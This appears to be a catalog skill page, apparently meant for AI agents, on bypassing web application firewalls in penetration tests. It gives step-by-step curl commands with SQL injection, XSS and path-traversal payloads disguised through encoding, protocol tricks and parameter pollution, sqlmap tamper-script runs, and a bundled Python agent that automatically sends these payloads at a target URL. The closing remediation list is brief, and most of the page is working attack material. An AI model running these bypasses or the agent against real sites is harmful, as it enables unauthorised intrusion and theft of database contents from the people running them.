Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-SkillsFramework mappings
MITRE ATT&CK
When to Use
- When confirmed vulnerabilities are blocked by WAF signature-based detection
- During penetration testing where WAF prevents exploitation of known issues
- When evaluating WAF rule effectiveness against evasion techniques
- During red team engagements requiring bypass of perimeter security controls
- When testing custom WAF rules for completeness and bypass resistance
Prerequisites
- Burp Suite Professional with SQLMap integration
- wafw00f for WAF fingerprinting and identification
- SQLMap with tamper scripts for automated WAF bypass
- Understanding of WAF detection mechanisms (signature, regex, behavioral)
- Collection of encoding and obfuscation techniques per attack type
- Knowledge of HTTP protocol nuances exploitable for evasion
Workflow
Step 1 — Identify and Fingerprint the WAF
# Detect WAF using wafw00f
wafw00f http://target.com
# Manual WAF detection via response headers
curl -sI http://target.com | grep -iE "x-cdn|server|x-powered-by|x-sucuri|cf-ray|x-akamai"
# Trigger WAF with known bad payload and analyze response
curl "http://target.com/page?id=1' OR 1=1--" -v
# Look for: 403 Forbidden, custom block page, CAPTCHA challenge
# Common WAF indicators:
# Cloudflare: cf-ray header, __cfduid cookie
# AWS WAF: x-amzn-requestid
# ModSecurity: Mod_Security or OWASP CRS error messages
# Akamai: AkamaiGHost header
# Imperva: incap_ses cookie, visid_incap cookieStep 2 — Bypass with Encoding and Obfuscation
# URL encoding bypass
curl "http://target.com/page?id=1%27%20OR%201%3D1--"
# Double URL encoding
curl "http://target.com/page?id=1%2527%2520OR%25201%253D1--"
# Unicode encoding
curl "http://target.com/page?id=1%u0027%u0020OR%u00201%u003D1--"
# HTML entity encoding in body
curl -X POST http://target.com/search \
-d "q=<script>alert(1)</script>"
# Mixed case SQL keywords
curl "http://target.com/page?id=1' UnIoN SeLeCt password FrOm users--"
# Inline comments between SQL keywords
curl "http://target.com/page?id=1'/*!UNION*//*!SELECT*/password/*!FROM*/users--"
# MySQL version-specific comments
curl "http://target.com/page?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--"
# Null bytes
curl "http://target.com/page?id=1'%00 OR 1=1--"
# Tab and newline substitution for spaces
curl "http://target.com/page?id=1'%09UNION%0ASELECT%0D1,2,3--"Step 3 — Bypass with HTTP Method and Protocol Tricks
# Change HTTP method (WAFs may only inspect GET/POST)
curl -X PUT "http://target.com/page?id=1' OR 1=1--"
curl -X PATCH "http://target.com/page" -d "id=1' OR 1=1--"
# Use HTTP/0.9 (no headers)
printf "GET /page?id=1' OR 1=1-- \r\n" | nc target.com 80
# Content-Type manipulation
curl -X POST http://target.com/page \
-H "Content-Type: application/x-www-form-urlencoded; charset=ibm037" \
-d "id=1' OR 1=1--"
# Multipart form data (may bypass body inspection)
curl -X POST http://target.com/page \
-F "id=1' OR 1=1--"
# Chunked Transfer-Encoding
printf "POST /page HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\n\r\n4\r\nid=1\r\n11\r\n' OR 1=1--\r\n0\r\n\r\n" | nc target.com 80
# Parameter in unusual locations
curl http://target.com/page -H "X-Forwarded-For: 1' OR 1=1--"
curl http://target.com/page -H "Referer: http://target.com/page?id=1' OR 1=1--"Step 4 — Bypass with Payload Splitting and HPP
# HTTP Parameter Pollution
curl "http://target.com/page?id=1' UNION&id=SELECT password FROM users--"
# Split payload across parameters
curl "http://target.com/page?id=1'/*&q=*/UNION SELECT 1,2,3--"
# JSON-based SQLi (many WAFs miss JSON payloads)
curl -X POST http://target.com/api/query \
-H "Content-Type: application/json" \
-d '{"id": "1 AND 1=1 UNION SELECT password FROM users"}'
# JSON SQL injection with operators
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt":"", "$where":"1==1"}}'
# XML-wrapped payloads
curl -X POST http://target.com/api/data \
-H "Content-Type: application/xml" \
-d "<data><id>1' UNION SELECT password FROM users--</id></data>"Step 5 — Use SQLMap Tamper Scripts
# SQLMap with built-in tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment
# Common tamper scripts for WAF bypass:
sqlmap -u "http://target.com/page?id=1" --tamper=charunicodeencode
sqlmap -u "http://target.com/page?id=1" --tamper=space2mssqlhash
sqlmap -u "http://target.com/page?id=1" --tamper=percentage
sqlmap -u "http://target.com/page?id=1" --tamper=chardoubleencode,between
# Multiple tamper scripts combined
sqlmap -u "http://target.com/page?id=1" \
--tamper=randomcase,space2comment,between,charunicodeencode \
--random-agent --level 5 --risk 3
# Custom WAF bypass profile
sqlmap -u "http://target.com/page?id=1" \
--tamper=space2comment,randomcase \
--delay=2 --random-agent \
--technique=B --batchStep 6 — XSS WAF Bypass Techniques
# Case variation
curl "http://target.com/page?q=<ScRiPt>alert(1)</ScRiPt>"
# Event handler alternatives
curl "http://target.com/page?q=<img src=x oNerRor=alert(1)>"
curl "http://target.com/page?q=<svg/onload=alert(1)>"
curl "http://target.com/page?q=<body onpageshow=alert(1)>"
curl "http://target.com/page?q=<marquee onstart=alert(1)>"
# JavaScript URI scheme
curl "http://target.com/page?q=<a href=javascript:alert(1)>click</a>"
# Template literal syntax
curl "http://target.com/page?q=<script>alert\x601\x60</script>"
# Concatenation-based bypass
curl "http://target.com/page?q=<script>al\u0065rt(1)</script>"
# HTML encoding within attributes
curl "http://target.com/page?q=<img src=x onerror=alert(1)>"
# Double encoding
curl "http://target.com/page?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E"Key Concepts
| Concept | Description |
|---|---|
| Signature Evasion | Obfuscating payloads to avoid matching WAF regex patterns |
| Encoding Bypass | Using URL, Unicode, or HTML encoding to disguise malicious characters |
| Protocol-Level Bypass | Exploiting HTTP protocol features (chunked encoding, method override) |
| Tamper Scripts | SQLMap modules that transform payloads to evade specific WAF rules |
| Content-Type Confusion | Sending payloads in unexpected content types the WAF does not inspect |
| Parameter Pollution | Splitting payloads across duplicate parameters to evade per-parameter inspection |
| Behavioral vs Signature | WAF detection modes: pattern matching (bypassable) vs. anomaly detection (harder) |
Tools & Systems
| Tool | Purpose |
|---|---|
| wafw00f | WAF fingerprinting and identification |
| SQLMap | Automated SQL injection with WAF bypass tamper scripts |
| waf-bypass.com | Community-maintained WAF bypass payload database |
| Awesome-WAF | Curated GitHub repository of WAF bypass techniques |
| Burp Suite | HTTP proxy for manual payload crafting and WAF response analysis |
| XSStrike | XSS scanner with WAF detection and bypass capabilities |
Common Scenarios
- SQLi Through JSON — Bypass WAF by sending SQL injection payloads inside JSON request bodies that are not inspected by the WAF rules
- XSS via Event Handlers — Use alternative HTML event handlers (onpageshow, onanimationstart) not covered by WAF signature rules
- Encoding Chain Bypass — Apply multiple layers of encoding (URL + Unicode + HTML entity) to evade each decoding layer of the WAF
- Chunked Transfer Bypass — Split malicious payload across HTTP chunked transfer encoding segments to avoid pattern matching
- Method Override — Send attack payloads via PUT/PATCH methods or custom headers that WAF does not inspect
Output Format
## WAF Bypass Assessment Report
- **Target**: http://target.com
- **WAF Identified**: Cloudflare (via cf-ray header)
- **Bypass Achieved**: Yes
### WAF Detection Results
| Payload Type | Blocked | Bypass Found |
|-------------|---------|-------------|
| Basic SQLi | Yes | Yes (JSON encoding) |
| UNION SELECT | Yes | Yes (inline comments) |
| XSS <script> | Yes | Yes (SVG onload) |
| Path Traversal | No | N/A (not blocked) |
### Successful Bypass Payloads
| # | Original (Blocked) | Bypass Payload | Technique |
|---|-------------------|---------------|-----------|
| 1 | 1' OR 1=1-- | {"id":"1' OR 1=1--"} | JSON content-type |
| 2 | UNION SELECT | /*!50000UNION*/ /*!50000SELECT*/ | MySQL version comments |
| 3 | <script>alert(1)</script> | <svg/onload=alert(1)> | Alternative tag+event |
### Remediation
- Enable JSON body inspection in WAF rules
- Implement behavioral analysis alongside signature detection
- Add rules for uncommon HTML tags and event handlers
- Enable deep content inspection for all HTTP methods
- Implement request normalization before rule evaluationSource materials
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 1
api-reference.md1.7 KB
API Reference: WAF Bypass Testing
Encoding Bypass Techniques
| Technique | Example | Description |
|---|---|---|
| URL Encoding | %3Cscript%3E |
Single URL encode |
| Double Encoding | %253Cscript%253E |
Double URL encode |
| Unicode/Fullwidth | \uff1cscript\uff1e |
Unicode replacement |
| HTML Entities | <script> |
Hex HTML entities |
| Null Byte | %00 insertion |
Terminate string parsing |
| Tab/Newline | scr\tipt |
Whitespace insertion |
SQLi WAF Bypass Techniques
| Technique | Payload Pattern |
|---|---|
| Inline Comment | 1'/**/OR/**/1=1-- |
| Version Comment | 1'/*!50000OR*/1=1-- |
| Case Variation | 1' oR 1=1-- |
| Hex Encoding | 0x313d31 |
| Buffer Overflow | Long padding before payload |
| Content-Type Switch | Send as application/json |
HTTP Method Bypass
| Method | WAF Behavior |
|---|---|
| GET/POST | Usually inspected |
| PUT/PATCH/DELETE | Often not inspected |
| OPTIONS | Typically bypasses rules |
WAF Detection Indicators
| Response | Meaning |
|---|---|
| 403 Forbidden | Request blocked by WAF |
| 406 Not Acceptable | Content rejected |
| 429 Too Many Requests | Rate limited |
| Custom error page | WAF vendor-specific block |
Python Libraries
| Library | Version | Purpose |
|---|---|---|
requests |
>=2.28 | HTTP request sending |
urllib.parse |
stdlib | URL encoding/double encoding |
References
- OWASP WAF Bypass: https://owasp.org/www-community/attacks/WAF_Bypass
- PortSwigger WAF Bypass: https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings
- PayloadsAllTheThings WAF: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/WAF%20Bypass
Scripts 1
agent.py6.0 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""Agent for testing WAF bypass techniques.
Sends encoded, obfuscated, and protocol-level bypass payloads
against a target URL to identify WAF evasion weaknesses in
XSS, SQLi, and path traversal filtering.
"""
import json
import os
import requests
import sys
import urllib.parse
from datetime import datetime
class WAFBypassAgent:
"""Tests web application firewall bypass techniques."""
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
self.findings = []
def _send(self, payload, param="q", method="GET", headers=None):
try:
if method == "GET":
resp = self.session.get(
self.target_url, params={param: payload},
headers=headers or {}, timeout=10, allow_redirects=False)
else:
resp = self.session.post(
self.target_url, data={param: payload},
headers=headers or {}, timeout=10, allow_redirects=False)
return {"status": resp.status_code, "length": len(resp.text),
"blocked": resp.status_code in (403, 406, 429, 501)}
except requests.RequestException as exc:
return {"error": str(exc)}
def test_encoding_bypasses(self, base_payload="<script>alert(1)</script>"):
"""Test URL encoding, double encoding, and Unicode bypasses."""
encodings = {
"plain": base_payload,
"url_encoded": urllib.parse.quote(base_payload),
"double_encoded": urllib.parse.quote(urllib.parse.quote(base_payload)),
"hex_entities": "".join(f"&#x{ord(c):02x};" for c in base_payload),
"unicode_fullwidth": base_payload.replace("<", "\uff1c").replace(">", "\uff1e"),
"null_byte": base_payload[:7] + "%00" + base_payload[7:],
"tab_insert": base_payload.replace("script", "scr\tipt"),
"newline_insert": base_payload.replace("script", "scr\nipt"),
}
results = []
for name, payload in encodings.items():
resp = self._send(payload)
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "Encoding Bypass", "technique": name,
"severity": "High"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_sqli_bypasses(self):
"""Test SQL injection WAF bypass techniques."""
payloads = {
"inline_comment": "1'/**/OR/**/1=1--",
"version_comment": "1'/*!50000OR*/1=1--",
"case_variation": "1' oR 1=1--",
"concat_function": "1' OR CONCAT(0x31)=1--",
"hex_encoding": "1' OR 0x313d31--",
"scientific_notation": "1' OR 1e0=1e0--",
"buffer_overflow": "1' OR " + "A" * 5000 + " 1=1--",
"json_content_type": "1' OR '1'='1",
}
results = []
for name, payload in payloads.items():
headers = {"Content-Type": "application/json"} if name == "json_content_type" else {}
resp = self._send(payload, method="POST", headers=headers)
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "SQLi WAF Bypass", "technique": name,
"severity": "Critical"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_path_traversal_bypasses(self):
"""Test path traversal WAF evasion."""
payloads = {
"dot_dot_slash": "../../../etc/passwd",
"encoded_dots": "..%2f..%2f..%2fetc%2fpasswd",
"double_encoded": "..%252f..%252f..%252fetc%252fpasswd",
"utf8_encoding": "..%c0%af..%c0%afetc/passwd",
"backslash": "..\\..\\..\\etc\\passwd",
"null_byte_ext": "../../../etc/passwd%00.png",
}
results = []
for name, payload in payloads.items():
resp = self._send(payload, param="file")
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "Path Traversal Bypass",
"technique": name, "severity": "High"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_http_method_bypass(self):
"""Test if WAF only inspects certain HTTP methods."""
methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS", "HEAD"]
payload = "<script>alert(1)</script>"
results = []
for method in methods:
try:
resp = self.session.request(method, self.target_url,
params={"q": payload}, timeout=10)
results.append({"method": method, "status": resp.status_code,
"blocked": resp.status_code in (403, 406, 429)})
except requests.RequestException:
results.append({"method": method, "error": "failed"})
return results
def generate_report(self):
report = {
"target": self.target_url,
"report_date": datetime.utcnow().isoformat(),
"total_bypasses": len(self.findings),
"findings": self.findings,
}
print(json.dumps(report, indent=2))
return report
def main():
url = sys.argv[1] if len(sys.argv) > 1 else os.environ.get("TARGET_URL", "http://localhost:8080/")
agent = WAFBypassAgent(url)
agent.test_encoding_bypasses()
agent.test_sqli_bypasses()
agent.test_path_traversal_bypasses()
agent.test_http_method_bypass()
agent.generate_report()
if __name__ == "__main__":
main()
Keep exploring